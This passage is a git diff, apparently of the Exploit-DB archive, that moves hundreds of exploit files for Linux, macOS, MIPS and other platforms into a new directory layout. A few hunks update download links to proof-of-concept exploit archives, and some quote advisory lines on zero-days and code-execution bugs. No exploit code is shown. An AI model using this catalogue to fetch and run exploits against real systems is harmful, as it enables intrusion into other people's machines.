platforms/linux/webapps/10757.txt rename to exploits/linux/webapps/10757.txt diff --git a/platforms/linux/webapps/14177.txt b/exploits/linux/webapps/14177.txt similarity index 100% rename from platforms/linux/webapps/14177.txt rename to exploits/linux/webapps/14177.txt diff --git a/platforms/linux/webapps/14818.pl b/exploits/linux/webapps/14818.pl similarity index 100% rename from platforms/linux/webapps/14818.pl rename to exploits/linux/webapps/14818.pl diff --git a/platforms/linux/webapps/16889.rb b/exploits/linux/webapps/16889.rb similarity index 100% rename from platforms/linux/webapps/16889.rb rename to exploits/linux/webapps/16889.rb diff --git a/platforms/linux/webapps/17941.rb b/exploits/linux/webapps/17941.rb similarity index 100% rename from platforms/linux/webapps/17941.rb rename to exploits/linux/webapps/17941.rb diff --git a/platforms/linux/webapps/18343.pl b/exploits/linux/webapps/18343.pl similarity index 100% rename from platforms/linux/webapps/18343.pl rename to exploits/linux/webapps/18343.pl diff --git a/platforms/linux/webapps/18797.rb b/exploits/linux/webapps/18797.rb similarity index 100% rename from platforms/linux/webapps/18797.rb rename to exploits/linux/webapps/18797.rb diff --git a/platforms/linux/webapps/18932.py b/exploits/linux/webapps/18932.py similarity index 100% rename from platforms/linux/webapps/18932.py rename to exploits/linux/webapps/18932.py diff --git a/platforms/linux/webapps/19406.txt b/exploits/linux/webapps/19406.txt similarity index 100% rename from platforms/linux/webapps/19406.txt rename to exploits/linux/webapps/19406.txt diff --git a/platforms/linux/webapps/20037.txt b/exploits/linux/webapps/20037.txt similarity index 100% rename from platforms/linux/webapps/20037.txt rename to exploits/linux/webapps/20037.txt diff --git a/platforms/linux/webapps/20038.py b/exploits/linux/webapps/20038.py similarity index 100% rename from platforms/linux/webapps/20038.py rename to exploits/linux/webapps/20038.py diff --git a/platforms/linux/webapps/20064.py b/exploits/linux/webapps/20064.py similarity index 100% rename from platforms/linux/webapps/20064.py rename to exploits/linux/webapps/20064.py diff --git a/platforms/linux/webapps/20706.rb b/exploits/linux/webapps/20706.rb similarity index 100% rename from platforms/linux/webapps/20706.rb rename to exploits/linux/webapps/20706.rb diff --git a/platforms/linux/webapps/20707.py b/exploits/linux/webapps/20707.py similarity index 100% rename from platforms/linux/webapps/20707.py rename to exploits/linux/webapps/20707.py diff --git a/platforms/linux/webapps/21836.rb b/exploits/linux/webapps/21836.rb similarity index 100% rename from platforms/linux/webapps/21836.rb rename to exploits/linux/webapps/21836.rb diff --git a/platforms/linux/webapps/23110.txt b/exploits/linux/webapps/23110.txt similarity index 100% rename from platforms/linux/webapps/23110.txt rename to exploits/linux/webapps/23110.txt diff --git a/platforms/linux/webapps/24932.txt b/exploits/linux/webapps/24932.txt similarity index 100% rename from platforms/linux/webapps/24932.txt rename to exploits/linux/webapps/24932.txt diff --git a/platforms/linux/webapps/27776.rb b/exploits/linux/webapps/27776.rb similarity index 100% rename from platforms/linux/webapps/27776.rb rename to exploits/linux/webapps/27776.rb diff --git a/platforms/linux/webapps/28175.txt b/exploits/linux/webapps/28175.txt similarity index 100% rename from platforms/linux/webapps/28175.txt rename to exploits/linux/webapps/28175.txt diff --git a/platforms/linux/webapps/28243.txt b/exploits/linux/webapps/28243.txt similarity index 100% rename from platforms/linux/webapps/28243.txt rename to exploits/linux/webapps/28243.txt diff --git a/platforms/linux/webapps/28558.txt b/exploits/linux/webapps/28558.txt similarity index 100% rename from platforms/linux/webapps/28558.txt rename to exploits/linux/webapps/28558.txt diff --git a/platforms/linux/webapps/28653.txt b/exploits/linux/webapps/28653.txt similarity index 100% rename from platforms/linux/webapps/28653.txt rename to exploits/linux/webapps/28653.txt diff --git a/platforms/linux/webapps/28979.txt b/exploits/linux/webapps/28979.txt similarity index 100% rename from platforms/linux/webapps/28979.txt rename to exploits/linux/webapps/28979.txt diff --git a/platforms/linux/webapps/30085.txt b/exploits/linux/webapps/30085.txt similarity index 93% rename from platforms/linux/webapps/30085.txt rename to exploits/linux/webapps/30085.txt index 028913eb9..b123a024f 100644 --- a/platforms/linux/webapps/30085.txt +++ b/exploits/linux/webapps/30085.txt @@ -8,7 +8,7 @@ # CVE : No CVE, no patch just 0Day # State : Critical -# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip) +# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30085.zip (zimbraexploit_rubina119.zip) ---------------Description----------------- diff --git a/platforms/linux/webapps/30286.txt b/exploits/linux/webapps/30286.txt similarity index 100% rename from platforms/linux/webapps/30286.txt rename to exploits/linux/webapps/30286.txt diff --git a/platforms/linux/webapps/30472.rb b/exploits/linux/webapps/30472.rb similarity index 100% rename from platforms/linux/webapps/30472.rb rename to exploits/linux/webapps/30472.rb diff --git a/platforms/linux/webapps/32869.rb b/exploits/linux/webapps/32869.rb similarity index 100% rename from platforms/linux/webapps/32869.rb rename to exploits/linux/webapps/32869.rb diff --git a/platforms/linux/webapps/34086.txt b/exploits/linux/webapps/34086.txt similarity index 100% rename from platforms/linux/webapps/34086.txt rename to exploits/linux/webapps/34086.txt diff --git a/platforms/linux/webapps/34130.rb b/exploits/linux/webapps/34130.rb similarity index 100% rename from platforms/linux/webapps/34130.rb rename to exploits/linux/webapps/34130.rb diff --git a/platforms/linux/webapps/34241.txt b/exploits/linux/webapps/34241.txt similarity index 100% rename from platforms/linux/webapps/34241.txt rename to exploits/linux/webapps/34241.txt diff --git a/platforms/linux/webapps/34672.txt b/exploits/linux/webapps/34672.txt similarity index 100% rename from platforms/linux/webapps/34672.txt rename to exploits/linux/webapps/34672.txt diff --git a/platforms/linux/webapps/36442.txt b/exploits/linux/webapps/36442.txt similarity index 100% rename from platforms/linux/webapps/36442.txt rename to exploits/linux/webapps/36442.txt diff --git a/platforms/linux/webapps/36619.txt b/exploits/linux/webapps/36619.txt similarity index 100% rename from platforms/linux/webapps/36619.txt rename to exploits/linux/webapps/36619.txt diff --git a/platforms/linux/webapps/36689.txt b/exploits/linux/webapps/36689.txt similarity index 100% rename from platforms/linux/webapps/36689.txt rename to exploits/linux/webapps/36689.txt diff --git a/platforms/linux/webapps/36963.txt b/exploits/linux/webapps/36963.txt similarity index 100% rename from platforms/linux/webapps/36963.txt rename to exploits/linux/webapps/36963.txt diff --git a/platforms/linux/webapps/37442.txt b/exploits/linux/webapps/37442.txt similarity index 100% rename from platforms/linux/webapps/37442.txt rename to exploits/linux/webapps/37442.txt diff --git a/platforms/linux/webapps/38383.py b/exploits/linux/webapps/38383.py similarity index 100% rename from platforms/linux/webapps/38383.py rename to exploits/linux/webapps/38383.py diff --git a/platforms/linux/webapps/38833.txt b/exploits/linux/webapps/38833.txt similarity index 100% rename from platforms/linux/webapps/38833.txt rename to exploits/linux/webapps/38833.txt diff --git a/platforms/linux/webapps/39500.txt b/exploits/linux/webapps/39500.txt similarity index 100% rename from platforms/linux/webapps/39500.txt rename to exploits/linux/webapps/39500.txt diff --git a/platforms/linux/webapps/39642.txt b/exploits/linux/webapps/39642.txt similarity index 100% rename from platforms/linux/webapps/39642.txt rename to exploits/linux/webapps/39642.txt diff --git a/platforms/linux/webapps/40171.txt b/exploits/linux/webapps/40171.txt similarity index 100% rename from platforms/linux/webapps/40171.txt rename to exploits/linux/webapps/40171.txt diff --git a/platforms/linux/webapps/40180.txt b/exploits/linux/webapps/40180.txt similarity index 100% rename from platforms/linux/webapps/40180.txt rename to exploits/linux/webapps/40180.txt diff --git a/platforms/linux/webapps/40249.txt b/exploits/linux/webapps/40249.txt similarity index 100% rename from platforms/linux/webapps/40249.txt rename to exploits/linux/webapps/40249.txt diff --git a/platforms/linux/webapps/40377.txt b/exploits/linux/webapps/40377.txt similarity index 100% rename from platforms/linux/webapps/40377.txt rename to exploits/linux/webapps/40377.txt diff --git a/platforms/linux/webapps/40378.txt b/exploits/linux/webapps/40378.txt similarity index 100% rename from platforms/linux/webapps/40378.txt rename to exploits/linux/webapps/40378.txt diff --git a/platforms/linux/webapps/41040.txt b/exploits/linux/webapps/41040.txt similarity index 100% rename from platforms/linux/webapps/41040.txt rename to exploits/linux/webapps/41040.txt diff --git a/platforms/linux/webapps/41141.txt b/exploits/linux/webapps/41141.txt similarity index 100% rename from platforms/linux/webapps/41141.txt rename to exploits/linux/webapps/41141.txt diff --git a/platforms/linux/webapps/41223.py b/exploits/linux/webapps/41223.py similarity index 100% rename from platforms/linux/webapps/41223.py rename to exploits/linux/webapps/41223.py diff --git a/platforms/linux/webapps/41224.rb b/exploits/linux/webapps/41224.rb similarity index 100% rename from platforms/linux/webapps/41224.rb rename to exploits/linux/webapps/41224.rb diff --git a/platforms/linux/webapps/41312.txt b/exploits/linux/webapps/41312.txt similarity index 100% rename from platforms/linux/webapps/41312.txt rename to exploits/linux/webapps/41312.txt diff --git a/platforms/linux/webapps/41414.rb b/exploits/linux/webapps/41414.rb similarity index 100% rename from platforms/linux/webapps/41414.rb rename to exploits/linux/webapps/41414.rb diff --git a/platforms/linux/webapps/41437.txt b/exploits/linux/webapps/41437.txt similarity index 100% rename from platforms/linux/webapps/41437.txt rename to exploits/linux/webapps/41437.txt diff --git a/platforms/linux/webapps/41570.py b/exploits/linux/webapps/41570.py similarity index 100% rename from platforms/linux/webapps/41570.py rename to exploits/linux/webapps/41570.py diff --git a/platforms/linux/webapps/41628.py b/exploits/linux/webapps/41628.py similarity index 100% rename from platforms/linux/webapps/41628.py rename to exploits/linux/webapps/41628.py diff --git a/platforms/linux/webapps/41676.rb b/exploits/linux/webapps/41676.rb similarity index 100% rename from platforms/linux/webapps/41676.rb rename to exploits/linux/webapps/41676.rb diff --git a/platforms/linux/webapps/41677.rb b/exploits/linux/webapps/41677.rb similarity index 100% rename from platforms/linux/webapps/41677.rb rename to exploits/linux/webapps/41677.rb diff --git a/platforms/linux/webapps/41697.rb b/exploits/linux/webapps/41697.rb similarity index 100% rename from platforms/linux/webapps/41697.rb rename to exploits/linux/webapps/41697.rb diff --git a/platforms/linux/webapps/41698.rb b/exploits/linux/webapps/41698.rb similarity index 100% rename from platforms/linux/webapps/41698.rb rename to exploits/linux/webapps/41698.rb diff --git a/platforms/linux/webapps/41950.py b/exploits/linux/webapps/41950.py similarity index 100% rename from platforms/linux/webapps/41950.py rename to exploits/linux/webapps/41950.py diff --git a/platforms/linux/webapps/41962.sh b/exploits/linux/webapps/41962.sh similarity index 100% rename from platforms/linux/webapps/41962.sh rename to exploits/linux/webapps/41962.sh diff --git a/platforms/linux/webapps/41963.txt b/exploits/linux/webapps/41963.txt similarity index 100% rename from platforms/linux/webapps/41963.txt rename to exploits/linux/webapps/41963.txt diff --git a/platforms/linux/webapps/41976.py b/exploits/linux/webapps/41976.py similarity index 100% rename from platforms/linux/webapps/41976.py rename to exploits/linux/webapps/41976.py diff --git a/platforms/linux/webapps/42101.py b/exploits/linux/webapps/42101.py similarity index 100% rename from platforms/linux/webapps/42101.py rename to exploits/linux/webapps/42101.py diff --git a/platforms/linux/webapps/42149.py b/exploits/linux/webapps/42149.py similarity index 100% rename from platforms/linux/webapps/42149.py rename to exploits/linux/webapps/42149.py diff --git a/platforms/linux/webapps/42187.py b/exploits/linux/webapps/42187.py similarity index 100% rename from platforms/linux/webapps/42187.py rename to exploits/linux/webapps/42187.py diff --git a/platforms/linux/webapps/42269.txt b/exploits/linux/webapps/42269.txt similarity index 100% rename from platforms/linux/webapps/42269.txt rename to exploits/linux/webapps/42269.txt diff --git a/platforms/linux/webapps/42290.txt b/exploits/linux/webapps/42290.txt similarity index 100% rename from platforms/linux/webapps/42290.txt rename to exploits/linux/webapps/42290.txt diff --git a/platforms/linux/webapps/42306.txt b/exploits/linux/webapps/42306.txt similarity index 100% rename from platforms/linux/webapps/42306.txt rename to exploits/linux/webapps/42306.txt diff --git a/platforms/linux/webapps/42314.txt b/exploits/linux/webapps/42314.txt similarity index 100% rename from platforms/linux/webapps/42314.txt rename to exploits/linux/webapps/42314.txt diff --git a/platforms/linux/webapps/42745.py b/exploits/linux/webapps/42745.py similarity index 100% rename from platforms/linux/webapps/42745.py rename to exploits/linux/webapps/42745.py diff --git a/platforms/linux/webapps/42769.rb b/exploits/linux/webapps/42769.rb similarity index 100% rename from platforms/linux/webapps/42769.rb rename to exploits/linux/webapps/42769.rb diff --git a/platforms/linux/webapps/42975.txt b/exploits/linux/webapps/42975.txt similarity index 100% rename from platforms/linux/webapps/42975.txt rename to exploits/linux/webapps/42975.txt diff --git a/platforms/linux/webapps/42991.txt b/exploits/linux/webapps/42991.txt similarity index 100% rename from platforms/linux/webapps/42991.txt rename to exploits/linux/webapps/42991.txt diff --git a/platforms/linux/webapps/6026.pl b/exploits/linux/webapps/6026.pl similarity index 100% rename from platforms/linux/webapps/6026.pl rename to exploits/linux/webapps/6026.pl diff --git a/platforms/linux_mips/remote/27133.py b/exploits/linux_mips/remote/27133.py similarity index 100% rename from platforms/linux_mips/remote/27133.py rename to exploits/linux_mips/remote/27133.py diff --git a/platforms/linux_mips/remote/40740.rb b/exploits/linux_mips/remote/40740.rb similarity index 100% rename from platforms/linux_mips/remote/40740.rb rename to exploits/linux_mips/remote/40740.rb diff --git a/platforms/linux_mips/remote/43143.rb b/exploits/linux_mips/remote/43143.rb similarity index 100% rename from platforms/linux_mips/remote/43143.rb rename to exploits/linux_mips/remote/43143.rb diff --git a/platforms/linux_sparc/remote/346.c b/exploits/linux_sparc/remote/346.c similarity index 100% rename from platforms/linux_sparc/remote/346.c rename to exploits/linux_sparc/remote/346.c diff --git a/platforms/macos/dos/40952.c b/exploits/macos/dos/40952.c similarity index 100% rename from platforms/macos/dos/40952.c rename to exploits/macos/dos/40952.c diff --git a/platforms/macos/dos/40954.c b/exploits/macos/dos/40954.c similarity index 96% rename from platforms/macos/dos/40954.c rename to exploits/macos/dos/40954.c index 0df3f29d0..2176611cb 100644 --- a/platforms/macos/dos/40954.c +++ b/exploits/macos/dos/40954.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954 Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40954.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40954.zip Userspace MIG services often use mach_msg_server or mach_msg_server_once to implent an RPC server. diff --git a/platforms/macos/dos/41790.c b/exploits/macos/dos/41790.c similarity index 100% rename from platforms/macos/dos/41790.c rename to exploits/macos/dos/41790.c diff --git a/platforms/macos/dos/41791.c b/exploits/macos/dos/41791.c similarity index 100% rename from platforms/macos/dos/41791.c rename to exploits/macos/dos/41791.c diff --git a/platforms/macos/dos/41797.c b/exploits/macos/dos/41797.c similarity index 100% rename from platforms/macos/dos/41797.c rename to exploits/macos/dos/41797.c diff --git a/platforms/macos/dos/41798.c b/exploits/macos/dos/41798.c similarity index 100% rename from platforms/macos/dos/41798.c rename to exploits/macos/dos/41798.c diff --git a/platforms/macos/dos/42046.txt b/exploits/macos/dos/42046.txt similarity index 96% rename from platforms/macos/dos/42046.txt rename to exploits/macos/dos/42046.txt index f82daf2d0..594ef5840 100644 --- a/platforms/macos/dos/42046.txt +++ b/exploits/macos/dos/42046.txt @@ -54,4 +54,4 @@ This bug was verified using the following kernel version: root:xnu-3248.60.11.2.1~1/RELEASE_X86_64 x86_64 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42046.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42046.zip \ No newline at end of file diff --git a/platforms/macos/dos/42047.txt b/exploits/macos/dos/42047.txt similarity index 95% rename from platforms/macos/dos/42047.txt rename to exploits/macos/dos/42047.txt index e4814806a..219387fa1 100644 --- a/platforms/macos/dos/42047.txt +++ b/exploits/macos/dos/42047.txt @@ -25,4 +25,4 @@ addresses on the right are valid kernel stack pointers. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42047.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42047.zip \ No newline at end of file diff --git a/platforms/macos/dos/42056.c b/exploits/macos/dos/42056.c similarity index 100% rename from platforms/macos/dos/42056.c rename to exploits/macos/dos/42056.c diff --git a/platforms/macos/local/40669.txt b/exploits/macos/local/40669.txt similarity index 97% rename from platforms/macos/local/40669.txt rename to exploits/macos/local/40669.txt index aaf613b00..3a3509c58 100644 --- a/platforms/macos/local/40669.txt +++ b/exploits/macos/local/40669.txt @@ -246,4 +246,4 @@ Project Zero remains committed to a 90-day disclosure window, and will continue Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40669.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40669.zip \ No newline at end of file diff --git a/platforms/macos/local/40956.c b/exploits/macos/local/40956.c similarity index 97% rename from platforms/macos/local/40956.c rename to exploits/macos/local/40956.c index b1b539378..1ec095c7a 100644 --- a/platforms/macos/local/40956.c +++ b/exploits/macos/local/40956.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941 Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40956.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40956.zip The previous ref count overflow bugs were all kinda slow because they were quite deep in kernel code, a lot of mach message and MIG code had to run for each leak. diff --git a/platforms/macos/local/40957.c b/exploits/macos/local/40957.c similarity index 97% rename from platforms/macos/local/40957.c rename to exploits/macos/local/40957.c index 80bd80de8..670936da1 100644 --- a/platforms/macos/local/40957.c +++ b/exploits/macos/local/40957.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959 Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40957.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40957.zip When sending and receiving mach messages from userspace there are two important kernel objects; ipc_entry and ipc_object. diff --git a/platforms/macos/local/41853.txt b/exploits/macos/local/41853.txt similarity index 100% rename from platforms/macos/local/41853.txt rename to exploits/macos/local/41853.txt diff --git a/platforms/macos/local/41854.txt b/exploits/macos/local/41854.txt similarity index 100% rename from platforms/macos/local/41854.txt rename to exploits/macos/local/41854.txt diff --git a/platforms/macos/local/41952.txt b/exploits/macos/local/41952.txt similarity index 100% rename from platforms/macos/local/41952.txt rename to exploits/macos/local/41952.txt diff --git a/platforms/macos/local/42146.sh b/exploits/macos/local/42146.sh similarity index 100% rename from platforms/macos/local/42146.sh rename to exploits/macos/local/42146.sh diff --git a/platforms/macos/local/42334.txt b/exploits/macos/local/42334.txt similarity index 100% rename from platforms/macos/local/42334.txt rename to exploits/macos/local/42334.txt diff --git a/platforms/macos/local/42454.txt b/exploits/macos/local/42454.txt similarity index 100% rename from platforms/macos/local/42454.txt rename to exploits/macos/local/42454.txt diff --git a/platforms/macos/remote/41443.html b/exploits/macos/remote/41443.html similarity index 100% rename from platforms/macos/remote/41443.html rename to exploits/macos/remote/41443.html diff --git a/platforms/macos/remote/41964.html b/exploits/macos/remote/41964.html similarity index 100% rename from platforms/macos/remote/41964.html rename to exploits/macos/remote/41964.html diff --git a/platforms/macos/remote/42125.txt b/exploits/macos/remote/42125.txt similarity index 97% rename from platforms/macos/remote/42125.txt rename to exploits/macos/remote/42125.txt index 10b4f56a9..d3a5a3ddd 100644 --- a/platforms/macos/remote/42125.txt +++ b/exploits/macos/remote/42125.txt @@ -18,4 +18,4 @@ In our exploit we perform step 5 in a separate web worker, so that we can launch Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42125.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42125.zip \ No newline at end of file diff --git a/platforms/macos/webapps/41449.html b/exploits/macos/webapps/41449.html similarity index 100% rename from platforms/macos/webapps/41449.html rename to exploits/macos/webapps/41449.html diff --git a/platforms/minix/dos/6120.txt b/exploits/minix/dos/6120.txt similarity index 100% rename from platforms/minix/dos/6120.txt rename to exploits/minix/dos/6120.txt diff --git a/platforms/minix/dos/6129.txt b/exploits/minix/dos/6129.txt similarity index 100% rename from platforms/minix/dos/6129.txt rename to exploits/minix/dos/6129.txt diff --git a/platforms/multiple/dos/10004.txt b/exploits/multiple/dos/10004.txt similarity index 100% rename from platforms/multiple/dos/10004.txt rename to exploits/multiple/dos/10004.txt diff --git a/platforms/multiple/dos/10077.txt b/exploits/multiple/dos/10077.txt similarity index 100% rename from platforms/multiple/dos/10077.txt rename to exploits/multiple/dos/10077.txt diff --git a/platforms/multiple/dos/1008.c b/exploits/multiple/dos/1008.c similarity index 100% rename from platforms/multiple/dos/1008.c rename to exploits/multiple/dos/1008.c diff --git a/platforms/multiple/dos/10205.txt b/exploits/multiple/dos/10205.txt similarity index 95% rename from platforms/multiple/dos/10205.txt rename to exploits/multiple/dos/10205.txt index 4eacf6ce7..bb231e18f 100644 --- a/platforms/multiple/dos/10205.txt +++ b/exploits/multiple/dos/10205.txt @@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file diff --git a/platforms/multiple/dos/10229.txt b/exploits/multiple/dos/10229.txt similarity index 100% rename from platforms/multiple/dos/10229.txt rename to exploits/multiple/dos/10229.txt diff --git a/platforms/multiple/dos/10327.txt b/exploits/multiple/dos/10327.txt similarity index 95% rename from platforms/multiple/dos/10327.txt rename to exploits/multiple/dos/10327.txt index f888b9346..d63c6fa9c 100644 --- a/platforms/multiple/dos/10327.txt +++ b/exploits/multiple/dos/10327.txt @@ -146,4 +146,4 @@ Avaya Intuity AUDIX LX 2.0 Avaya Intuity AUDIX LX 1.0 Avaya Intuity AUDIX -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10327.pdf (2009-12-05-34337.pdf) \ No newline at end of file diff --git a/platforms/multiple/dos/10334.py b/exploits/multiple/dos/10334.py similarity index 100% rename from platforms/multiple/dos/10334.py rename to exploits/multiple/dos/10334.py diff --git a/platforms/multiple/dos/1037.c b/exploits/multiple/dos/1037.c similarity index 100% rename from platforms/multiple/dos/1037.c rename to exploits/multiple/dos/1037.c diff --git a/platforms/multiple/dos/1056.pl b/exploits/multiple/dos/1056.pl similarity index 100% rename from platforms/multiple/dos/1056.pl rename to exploits/multiple/dos/1056.pl diff --git a/platforms/multiple/dos/1072.cpp b/exploits/multiple/dos/1072.cpp similarity index 100% rename from platforms/multiple/dos/1072.cpp rename to exploits/multiple/dos/1072.cpp diff --git a/platforms/multiple/dos/10870.html b/exploits/multiple/dos/10870.html similarity index 100% rename from platforms/multiple/dos/10870.html rename to exploits/multiple/dos/10870.html diff --git a/platforms/multiple/dos/10960.pl b/exploits/multiple/dos/10960.pl similarity index 100% rename from platforms/multiple/dos/10960.pl rename to exploits/multiple/dos/10960.pl diff --git a/platforms/multiple/dos/11009.pl b/exploits/multiple/dos/11009.pl similarity index 100% rename from platforms/multiple/dos/11009.pl rename to exploits/multiple/dos/11009.pl diff --git a/platforms/multiple/dos/11106.bat b/exploits/multiple/dos/11106.bat similarity index 100% rename from platforms/multiple/dos/11106.bat rename to exploits/multiple/dos/11106.bat diff --git a/platforms/multiple/dos/11142.txt b/exploits/multiple/dos/11142.txt similarity index 94% rename from platforms/multiple/dos/11142.txt rename to exploits/multiple/dos/11142.txt index 27574c771..a3e2421cf 100644 --- a/platforms/multiple/dos/11142.txt +++ b/exploits/multiple/dos/11142.txt @@ -45,4 +45,4 @@ Not Vulnerable: Firefox 3.5.3 on Windows crashed once but not reliably. PoC Packagetx: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) \ No newline at end of file diff --git a/platforms/multiple/dos/11288.py b/exploits/multiple/dos/11288.py similarity index 100% rename from platforms/multiple/dos/11288.py rename to exploits/multiple/dos/11288.py diff --git a/platforms/multiple/dos/11426.txt b/exploits/multiple/dos/11426.txt similarity index 100% rename from platforms/multiple/dos/11426.txt rename to exploits/multiple/dos/11426.txt diff --git a/platforms/multiple/dos/11529.txt b/exploits/multiple/dos/11529.txt similarity index 100% rename from platforms/multiple/dos/11529.txt rename to exploits/multiple/dos/11529.txt diff --git a/platforms/multiple/dos/11567.txt b/exploits/multiple/dos/11567.txt similarity index 100% rename from platforms/multiple/dos/11567.txt rename to exploits/multiple/dos/11567.txt diff --git a/platforms/multiple/dos/11590.php b/exploits/multiple/dos/11590.php similarity index 100% rename from platforms/multiple/dos/11590.php rename to exploits/multiple/dos/11590.php diff --git a/platforms/multiple/dos/11644.py b/exploits/multiple/dos/11644.py similarity index 100% rename from platforms/multiple/dos/11644.py rename to exploits/multiple/dos/11644.py diff --git a/platforms/multiple/dos/11705.c b/exploits/multiple/dos/11705.c similarity index 100% rename from platforms/multiple/dos/11705.c rename to exploits/multiple/dos/11705.c diff --git a/platforms/multiple/dos/11717.php b/exploits/multiple/dos/11717.php similarity index 100% rename from platforms/multiple/dos/11717.php rename to exploits/multiple/dos/11717.php diff --git a/platforms/multiple/dos/1176.c b/exploits/multiple/dos/1176.c similarity index 100% rename from platforms/multiple/dos/1176.c rename to exploits/multiple/dos/1176.c diff --git a/platforms/multiple/dos/11763.pl b/exploits/multiple/dos/11763.pl similarity index 100% rename from platforms/multiple/dos/11763.pl rename to exploits/multiple/dos/11763.pl diff --git a/platforms/multiple/dos/11792.pl b/exploits/multiple/dos/11792.pl similarity index 100% rename from platforms/multiple/dos/11792.pl rename to exploits/multiple/dos/11792.pl diff --git a/platforms/multiple/dos/11855.c b/exploits/multiple/dos/11855.c similarity index 100% rename from platforms/multiple/dos/11855.c rename to exploits/multiple/dos/11855.c diff --git a/platforms/multiple/dos/1204.html b/exploits/multiple/dos/1204.html similarity index 100% rename from platforms/multiple/dos/1204.html rename to exploits/multiple/dos/1204.html diff --git a/platforms/multiple/dos/12109.txt b/exploits/multiple/dos/12109.txt similarity index 100% rename from platforms/multiple/dos/12109.txt rename to exploits/multiple/dos/12109.txt diff --git a/platforms/multiple/dos/1213.c b/exploits/multiple/dos/1213.c similarity index 100% rename from platforms/multiple/dos/1213.c rename to exploits/multiple/dos/1213.c diff --git a/platforms/multiple/dos/12165.txt b/exploits/multiple/dos/12165.txt similarity index 100% rename from platforms/multiple/dos/12165.txt rename to exploits/multiple/dos/12165.txt diff --git a/platforms/multiple/dos/12188.txt b/exploits/multiple/dos/12188.txt similarity index 100% rename from platforms/multiple/dos/12188.txt rename to exploits/multiple/dos/12188.txt diff --git a/platforms/multiple/dos/12217.py b/exploits/multiple/dos/12217.py similarity index 100% rename from platforms/multiple/dos/12217.py rename to exploits/multiple/dos/12217.py diff --git a/platforms/multiple/dos/12324.py b/exploits/multiple/dos/12324.py similarity index 100% rename from platforms/multiple/dos/12324.py rename to exploits/multiple/dos/12324.py diff --git a/platforms/multiple/dos/1233.html b/exploits/multiple/dos/1233.html similarity index 100% rename from platforms/multiple/dos/1233.html rename to exploits/multiple/dos/1233.html diff --git a/platforms/multiple/dos/12382.txt b/exploits/multiple/dos/12382.txt similarity index 100% rename from platforms/multiple/dos/12382.txt rename to exploits/multiple/dos/12382.txt diff --git a/platforms/multiple/dos/12401.html b/exploits/multiple/dos/12401.html similarity index 100% rename from platforms/multiple/dos/12401.html rename to exploits/multiple/dos/12401.html diff --git a/platforms/multiple/dos/12491.html b/exploits/multiple/dos/12491.html similarity index 100% rename from platforms/multiple/dos/12491.html rename to exploits/multiple/dos/12491.html diff --git a/platforms/multiple/dos/12493.html b/exploits/multiple/dos/12493.html similarity index 100% rename from platforms/multiple/dos/12493.html rename to exploits/multiple/dos/12493.html diff --git a/platforms/multiple/dos/1253.html b/exploits/multiple/dos/1253.html similarity index 100% rename from platforms/multiple/dos/1253.html rename to exploits/multiple/dos/1253.html diff --git a/platforms/multiple/dos/1254.html b/exploits/multiple/dos/1254.html similarity index 100% rename from platforms/multiple/dos/1254.html rename to exploits/multiple/dos/1254.html diff --git a/platforms/multiple/dos/12555.txt b/exploits/multiple/dos/12555.txt similarity index 100% rename from platforms/multiple/dos/12555.txt rename to exploits/multiple/dos/12555.txt diff --git a/platforms/multiple/dos/1256.pl b/exploits/multiple/dos/1256.pl similarity index 100% rename from platforms/multiple/dos/1256.pl rename to exploits/multiple/dos/1256.pl diff --git a/platforms/multiple/dos/1257.html b/exploits/multiple/dos/1257.html similarity index 100% rename from platforms/multiple/dos/1257.html rename to exploits/multiple/dos/1257.html diff --git a/platforms/multiple/dos/1268.pl b/exploits/multiple/dos/1268.pl similarity index 100% rename from platforms/multiple/dos/1268.pl rename to exploits/multiple/dos/1268.pl diff --git a/platforms/multiple/dos/12775.py b/exploits/multiple/dos/12775.py similarity index 100% rename from platforms/multiple/dos/12775.py rename to exploits/multiple/dos/12775.py diff --git a/platforms/multiple/dos/1331.c b/exploits/multiple/dos/1331.c similarity index 100% rename from platforms/multiple/dos/1331.c rename to exploits/multiple/dos/1331.c diff --git a/platforms/multiple/dos/1390.c b/exploits/multiple/dos/1390.c similarity index 100% rename from platforms/multiple/dos/1390.c rename 